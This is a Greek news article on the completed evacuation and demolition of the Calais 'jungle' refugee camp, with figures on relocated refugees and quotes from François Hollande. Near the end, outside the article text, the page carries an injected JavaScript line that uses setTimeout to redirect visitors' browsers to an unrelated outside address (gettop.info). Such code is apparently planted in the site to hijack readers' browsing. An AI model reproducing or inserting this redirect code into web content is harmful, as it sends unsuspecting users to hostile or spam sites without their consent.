Ολοκληρώθηκε η εκκένωση της «ζούγκλας» του Καλαί

0
2

 

Κατεδαφίστηκαν και τα τελευταία παραπήγματα στη «ζούγκλα» του Καλαί, η εκκένωση της οποίας ξεκίνησε πριν από οκτώ ημέρες. Από τις 24 Οκτωβρίου περίπου 5.000 ενήλικες απομακρύνθηκαν και μεταφέρθηκαν σε κέντρα υποδοχής σε όλη τη Γαλλία.

Την ίδια ώρα όμως ένας καταυλισμός Σουδανών, Αφγανών, Λίβυων και κατοίκων Ερυθραίας συνεχώς μεγαλώνει σε μια συνοικία του βόρειου Παρισιού, κοντά στην πλατεία Σταλινγκράντ, και μέχρι στιγμής μετρά 2.000 κατοίκους.

Χθες πραγματοποιήθηκε επιχείρηση «διοικητικού ελέγχου» ενώ κατά το σαββατοκύριακο πολλοί πολιτικοί, μεταξύ αυτών και ο ίδιος ο Γάλλος πρόεδρος, δεσμεύθηκαν να τον εκκενώσουν μέσα στην εβδομάδα.

Σε συνέντευξή του που δημοσιεύθηκε σήμερα στην περιφερειακή εφημερίδα La Voix du Nord ο Φρανσουά Ολάντ διαβεβαίωσε ότι «δεν πρόκειται να επανεγκατασταθούν» πρόσφυγες στη «ζούγκλα» του Καλαί.

Χαιρετίζοντας μια επιχείρηση «αποτελεσματική και δυναμική», ο Ολάντ εξέφρασε την ικανοποίησή του για το γεγονός ότι «από τον Οκτώβριο του 2015, 13.000 πρόσφυγες οδηγήθηκαν από το Καλαί σε κέντρα υποδοχής».

Μετά την επέμβαση εκσκαφέων στο Καλαί δεν έχουν μείνει παρά ερείπια, μερικές δεκάδες τροχόσπιτα τα οποία επίσης θα καταστραφούν, καθώς και μια μικρή εκκλησία και δύο μικρά τεμένη τα οποία είχαν χτίσει οι πρόσφυγες.

Περίπου 1.500 ανήλικοι, που έχουν εγκατασταθεί σε ένα ειδικό κέντρο υποδοχής, αναμένουν ακόμη την εξέταση της υπόθεσής τους από τις βρετανικές Αρχές, με την ελπίδα ότι θα καταφέρουν να περάσουν στην απέναντι όχθη της Μάγχης και να επανενωθούν με την οικογένειά τους που βρίσκεται εκεί.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here